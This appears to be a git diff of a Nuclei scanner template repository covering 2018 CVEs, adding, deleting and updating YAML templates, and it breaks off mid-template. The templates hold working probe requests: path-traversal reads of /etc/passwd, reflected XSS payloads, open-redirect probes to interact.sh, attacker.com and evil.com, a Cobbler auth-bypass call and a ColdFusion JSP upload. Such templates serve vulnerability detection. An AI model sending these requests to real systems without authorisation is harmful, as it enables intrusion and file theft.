https://nvd.nist.gov/vuln/detail/CVE-2018-9161 + - https://www.exploit-db.com/exploits/44276/ + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-9161 + cwe-id: CWE-798 + epss-score: 0.12574 + epss-percentile: 0.95318 + cpe: cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: prismaindustriale + product: checkweigher_prismaweb + tags: cve2018,cve,prismaweb,exposure,edb,prismaindustriale + +http: + - method: GET + path: + - "{{BaseURL}}/user/scripts/login_par.js" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'txtChkUser' + - 'txtChkPassword' + condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022100ffcd63af862f8b9aa24f999ad152b190ff12a716891947bdfcdf6f8928420413022006b1c871ad6ce93fb773c74b29e916effe0a6cb129653f58c5c4eb406cccfe6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-9205.yaml b/nuclei-templates/CVE-2018/CVE-2018-9205.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-9205.yaml rename to nuclei-templates/CVE-2018/CVE-2018-9205.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-9995.yaml b/nuclei-templates/CVE-2018/CVE-2018-9995.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-9995.yaml rename to nuclei-templates/CVE-2018/CVE-2018-9995.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-1000226.yaml b/nuclei-templates/CVE-2018/cve-2018-1000226.yaml index c070e810a9..5eb5e5ebfa 100644 --- a/nuclei-templates/CVE-2018/cve-2018-1000226.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-1000226.yaml @@ -1,21 +1,32 @@ id: CVE-2018-1000226 info: - name: Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass + name: Cobbler - Authentication Bypass author: c-sh0 severity: critical + description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler. reference: - https://github.com/cobbler/cobbler/issues/1916 - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-1000226 cwe-id: CWE-732 - tags: cve,cve2018,cobbler,auth-bypass + epss-score: 0.01309 + epss-percentile: 0.8563 + cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: cobblerd + product: cobbler + tags: cve2018,cve,cobbler,auth-bypass,cobblerd -requests: +http: - raw: - | POST {{BaseURL}}/cobbler_api HTTP/1.1 @@ -36,9 +47,9 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 + - type: dsl + dsl: + - "!contains(tolower(body), 'faultCode')" - type: word part: header @@ -50,11 +61,12 @@ requests: words: - "" - - type: dsl - dsl: - - "!contains(tolower(body), 'faultCode')" - - type: regex part: body regex: - "(.*[a-zA-Z0-9].+==)" + + - type: status + status: + - 200 +# digest: 4a0a0047304502201a7c5859f426d96f45cd86e280a49186d9b9ea388944c9ac9aa3c03a68f61219022100faca8e8923400b4cdf7ce1d714dde9bf2ed095375ead8f2870d6385412ee7e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-1000671.yaml b/nuclei-templates/CVE-2018/cve-2018-1000671.yaml deleted file mode 100644 index d6302807a8..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-1000671.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2018-1000671 - -info: - name: Sympa version =>6.2.16 - Cross-Site Scripting - author: 0x_Akoko - severity: medium - description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs. - reference: - - https://github.com/sympa-community/sympa/issues/268 - - https://vuldb.com/?id.123670 - - https://nvd.nist.gov/vuln/detail/CVE-2018-1000671 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-1000671 - cwe-id: CWE-601 - metadata: - shodan-query: http.html:"sympa" - verified: "true" - tags: cve,cve2018,redirect,sympa,debian - -requests: - - method: GET - path: - - '{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email=' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by mp on 2022/08/18 diff --git a/nuclei-templates/CVE-2018/CVE-2018-1000856.yaml b/nuclei-templates/CVE-2018/cve-2018-1000856.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-1000856.yaml rename to nuclei-templates/CVE-2018/cve-2018-1000856.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-10230.yaml b/nuclei-templates/CVE-2018/cve-2018-10230.yaml index 9d1ac7b5e4..feadcb357a 100644 --- a/nuclei-templates/CVE-2018/cve-2018-10230.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-10230.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade Zend Server to version 9.13 or later to mitigate this vulnerability. reference: - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf - https://www.zend.com/en/products/server/release-notes @@ -15,9 +19,16 @@ info: cvss-score: 6.1 cve-id: CVE-2018-10230 cwe-id: CWE-79 + epss-score: 0.00122 + epss-percentile: 0.46318 + cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zend + product: zend_server tags: cve,cve2018,xss,zend -requests: +http: - method: GET path: - "{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1" @@ -39,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/08/18 +# digest: 490a0046304402201423fd900a1cd2dcf52028722c5f7a43f8b6d20d5a5b65d58f59ffed42a8f6ff02205da25d220a25b5faef2f03778f2b749c7a385c901429baf839f1815fc1681d28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-10956.yaml b/nuclei-templates/CVE-2018/cve-2018-10956.yaml index 1cde241ed5..a509b9736d 100644 --- a/nuclei-templates/CVE-2018/cve-2018-10956.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-10956.yaml @@ -1,23 +1,37 @@ id: CVE-2018-10956 + info: - name: IPConfigure Orchid Core VMS 2.0.5 - Unauthenticated Directory Traversal. + name: IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion author: 0x_Akoko severity: high - description: IPConfigure Orchid Core VMS 2.0.5 allows Directory Traversal. + description: | + IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system. + remediation: | + Update to the latest version of IPConfigure Orchid Core VMS to mitigate the LFI vulnerability. reference: - https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/ - https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb - - https://www.cvedetails.com/cve/CVE-2018-10956 + - https://www.exploit-db.com/exploits/44916/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-10956 + - https://github.com/xbl3/awesome-cve-poc_qazbnm456 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-10956 cwe-id: CWE-22 + epss-score: 0.57917 + epss-percentile: 0.97652 + cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: ipconfigure + product: orchid_core_vms shodan-query: http.title:"Orchid Core VMS" - tags: cve,cve2018,orchid,vms,lfi + tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure -requests: +http: - method: GET path: - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd" @@ -31,3 +45,4 @@ requests: - type: status status: - 200 +# digest: 4b0a00483046022100f4b3ba62ada360ed542a1dc3aeb23fe810a3516b33b87653ac8cc1e848028c5b0221009dcb0edfc90ad78d55ad83bcfc106071329ffdb8ca67a671481c79a10b2a61cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-11510.yaml b/nuclei-templates/CVE-2018/cve-2018-11510.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-11510.yaml rename to nuclei-templates/CVE-2018/cve-2018-11510.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-11709.yaml b/nuclei-templates/CVE-2018/cve-2018-11709.yaml new file mode 100644 index 0000000000..a5c31e20e5 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-11709.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-11709 + +info: + name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709 + tags: cve,cve2018,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-11709 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-11759.yaml b/nuclei-templates/CVE-2018/cve-2018-11759.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-11759.yaml rename to nuclei-templates/CVE-2018/cve-2018-11759.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-12031.yaml b/nuclei-templates/CVE-2018/cve-2018-12031.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-12031.yaml rename to nuclei-templates/CVE-2018/cve-2018-12031.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-12300.yaml b/nuclei-templates/CVE-2018/cve-2018-12300.yaml deleted file mode 100644 index aac189bfd8..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-12300.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2018-12300 - -info: - name: Seagate NAS OS 4.3.15.1 - Open redirect - author: 0x_Akoko - severity: medium - description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter. - reference: - - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 - - https://www.cvedetails.com/cve/CVE-2018-12300 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-12300 - cwe-id: CWE-601 - tags: cve,cve2018,redirect,seagate,nasos - -requests: - - method: GET - - path: - - '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2018/cve-2018-1247.yaml b/nuclei-templates/CVE-2018/cve-2018-1247.yaml index e522302ccb..4d0cf1ab7e 100644 --- a/nuclei-templates/CVE-2018/cve-2018-1247.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-1247.yaml @@ -4,6 +4,7 @@ info: name: RSA Authentication Manager XSS author: madrobot severity: medium + tags: cve,cve2018,xss,flash requests: - method: GET diff --git a/nuclei-templates/CVE-2018/CVE-2018-12613.yaml b/nuclei-templates/CVE-2018/cve-2018-12613.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-12613.yaml rename to nuclei-templates/CVE-2018/cve-2018-12613.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-12675.yaml b/nuclei-templates/CVE-2018/cve-2018-12675.yaml deleted file mode 100644 index d1f5d24b6f..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-12675.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2018-12675 - -info: - name: SV3C HD Camera L Series - Open Redirect - author: 0x_Akoko - severity: medium - description: | - SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - reference: - - https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory - - https://vuldb.com/?id.125799 - - https://www.bishopfox.com/news/2018/10/sv3c-l-series-hd-camera-multiple-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-12675 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-12675 - cwe-id: CWE-601 - metadata: - verified: "true" - tags: cve,cve2018,redirect,sv3c,camera,iot - -requests: - - method: GET - path: - - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh' - - matchers: - - type: word - part: body - words: - - '' - -# Enhanced by md on 2022/10/13 diff --git a/nuclei-templates/CVE-2018/CVE-2018-1273.yaml b/nuclei-templates/CVE-2018/cve-2018-1273.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-1273.yaml rename to nuclei-templates/CVE-2018/cve-2018-1273.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-1335.yaml b/nuclei-templates/CVE-2018/cve-2018-1335.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-1335.yaml rename to nuclei-templates/CVE-2018/cve-2018-1335.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-13980.yaml b/nuclei-templates/CVE-2018/cve-2018-13980.yaml new file mode 100644 index 0000000000..3f6afd77f7 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-13980.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-13980 + +info: + name: Zeta Producer Desktop CMS 14.2.0 - Local File Disclosure + author: wisnupramoedya + severity: medium + description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. + reference: + - https://www.exploit-db.com/exploits/45016 + - https://nvd.nist.gov/vuln/detail/CVE-2018-13980 + tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.50 + cve-id: CVE-2018-13980 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-14064.yaml b/nuclei-templates/CVE-2018/cve-2018-14064.yaml new file mode 100644 index 0000000000..f3452b953f --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-14064.yaml @@ -0,0 +1,33 @@ +id: CVE-2018-14064 + +info: + name: VelotiSmart Wifi - Directory Traversal + author: 0x_Akoko + severity: critical + description: The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80. + reference: + - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac + - https://www.exploit-db.com/exploits/45030 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 + tags: cve,cve2018,lfi,camera,iot + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-14064 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-14574.yaml b/nuclei-templates/CVE-2018/cve-2018-14574.yaml deleted file mode 100644 index 528e24f879..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-14574.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: cve-2018-14574 - -info: - name: Django Open Redirect - author: pikpikcu - severity: low - tags: cve,cve2018,django,redirect - -requests: - - method: GET - path: - - "{{BaseURL}}//www.example.com" - - matchers-condition: and - matchers: - - type: status - status: - - 301 - - type: word - words: - - "Location: https://www.example.com" - - "Location: http://www.example.com" - part: header diff --git a/nuclei-templates/CVE-2018/cve-2018-14918.yaml b/nuclei-templates/CVE-2018/cve-2018-14918.yaml deleted file mode 100644 index 4c75905015..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-14918.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2018-14918 - -info: - name: LOYTEC LGATE-902 6.3.2 - Local File Inclusion - author: 0x_Akoko - severity: high - description: | - LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords. - reference: - - https://seclists.org/fulldisclosure/2019/Apr/12 - - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html - - https://nvd.nist.gov/vuln/detail/CVE-2018-14918 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-14918 - cwe-id: CWE-22 - metadata: - shodan-query: http.html:"LGATE-902" - verified: "true" - tags: loytec,lfi,seclists,packetstorm,cve,cve2018,lgate - -requests: - - method: GET - path: - - "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152" - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/07 diff --git a/nuclei-templates/CVE-2018/cve-2018-15138.yaml b/nuclei-templates/CVE-2018/cve-2018-15138.yaml new file mode 100644 index 0000000000..7548517b7e --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-15138.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-15138 +info: + name: LG-Ericsson iPECS NMS 30M Directory Traversal + author: 0x_Akoko + severity: high + description: Ericsson-LG iPECS NMS 30M allows directory traversal via ipecs-cm/download?filename=../ URIs. + reference: + - https://cxsecurity.com/issue/WLB-2018080070 + - https://nvd.nist.gov/vuln/detail/CVE-2018-15138 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-15138 + cwe-id: CWE-22 + tags: cve,cve2018,ericsson,lfi,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data" + - "{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-15961.yaml b/nuclei-templates/CVE-2018/cve-2018-15961.yaml new file mode 100644 index 0000000000..fc6dc72993 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-15961.yaml @@ -0,0 +1,65 @@ +id: CVE-2018-15961 + +info: + name: Adobe ColdFusion Unrestricted File Upload RCE + author: SkyLark-Lab,ImNightmaree + severity: critical + description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-15961 + - https://github.com/xbufu/CVE-2018-15961 + tags: cve,cve2018,adobe,rce,coldfusion,fileupload + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-15961 + cwe-id: CWE-434 + +requests: + - raw: + - | + POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------24464570528145 + + -----------------------------24464570528145 + Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" + Content-Type: image/jpeg + + <%@ page import="java.util.*,java.io.*"%> + <%@ page import="java.security.MessageDigest"%> + <% + String cve = "CVE-2018-15961"; + MessageDigest alg = MessageDigest.getInstance("MD5"); + alg.reset(); + alg.update(cve.getBytes()); + byte[] digest = alg.digest(); + StringBuffer hashedpasswd = new StringBuffer(); + String hx; + for (int i=0;i + -----------------------------24464570528145 + Content-Disposition: form-data; name="path" + + {{randstr}}.jsp + -----------------------------24464570528145-- + + - | + GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + + - type: word + words: + - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961 + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-16341.yaml b/nuclei-templates/CVE-2018/cve-2018-16341.yaml index ab875f5b52..eac56aef00 100644 --- a/nuclei-templates/CVE-2018/cve-2018-16341.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-16341.yaml @@ -1,10 +1,12 @@ -id: cve-2018-16341 +id: CVE-2018-16341 + info: name: Nuxeo Authentication Bypass Remote Code Execution author: madrobot severity: high description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI - tags: cve,cve2018,nuxeo,ssti,rce + tags: cve,cve2018,nuxeo,ssti,rce,bypass + requests: - method: GET path: diff --git a/nuclei-templates/CVE-2018/CVE-2018-16671.yaml b/nuclei-templates/CVE-2018/cve-2018-16671.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-16671.yaml rename to nuclei-templates/CVE-2018/cve-2018-16671.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16716.yaml b/nuclei-templates/CVE-2018/cve-2018-16716.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-16716.yaml rename to nuclei-templates/CVE-2018/cve-2018-16716.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16761.yaml b/nuclei-templates/CVE-2018/cve-2018-16761.yaml index 7f0883240e..23f9df48fa 100644 --- a/nuclei-templates/CVE-2018/cve-2018-16761.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-16761.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. + remediation: | + Upgrade to Eventum version 3.4.0 or later to fix the open redirect vulnerability. reference: - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/ - https://github.com/eventum/eventum/releases/tag/v3.4.0 @@ -15,9 +19,16 @@ info: cvss-score: 6.1 cve-id: CVE-2018-16761 cwe-id: CWE-601 - tags: cve,cve2018,redirect,eventum,oss + epss-score: 0.00068 + epss-percentile: 0.28116 + cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: eventum_project + product: eventum + tags: cve,cve2018,redirect,eventum,oss,eventum_project -requests: +http: - method: GET path: - '{{BaseURL}}/select_project.php?url=http://interact.sh' @@ -28,6 +39,5 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by md on 2022/10/13 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4b0a00483046022100e1983ab57aad7d2f22f2ba0dea11509f38177f73e307a187c6b61e4dd913d631022100b3efb8776bfa1c1caa13f75f339008475a607f5169e8984cd452e62791d91515:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-16836.yaml b/nuclei-templates/CVE-2018/cve-2018-16836.yaml index b9f77b86e3..0a8102bf1d 100644 --- a/nuclei-templates/CVE-2018/cve-2018-16836.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-16836.yaml @@ -1,19 +1,29 @@ -id: rubedo-cms-directory-traversal +id: CVE-2018-16836 + info: name: Rubedo CMS 3.4.0 - Directory Traversal author: 0x_Akoko - severity: high + severity: critical reference: https://www.exploit-db.com/exploits/45385 - tags: rubedo,lfi + tags: cve,cve2018,rubedo,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-16836 + cwe-id: CWE-22 + description: "Rubedo through 3.4.0 contains a Directory Traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI." + requests: - method: GET path: - "{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd" + matchers-condition: and matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-17422.yaml b/nuclei-templates/CVE-2018/cve-2018-17422.yaml new file mode 100644 index 0000000000..28743e3369 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-17422.yaml @@ -0,0 +1,46 @@ +id: CVE-2018-17422 + +info: + name: DotCMS < 5.0.2 - Open Redirect + author: 0x_Akoko,daffainfo + severity: medium + description: | + dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. + remediation: | + Upgrade to a version of DotCMS that is higher than 5.0.2 to mitigate the open redirect vulnerability. + reference: + - https://github.com/dotCMS/core/issues/15286 + - https://nvd.nist.gov/vuln/detail/CVE-2018-17422 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-17422 + cwe-id: CWE-601 + epss-score: 0.00118 + epss-percentile: 0.44971 + cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: dotcms + product: dotcms + shodan-query: http.title:"dotCMS" + tags: cve2018,cve,redirect,dotcms + +http: + - method: GET + path: + - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com' + - 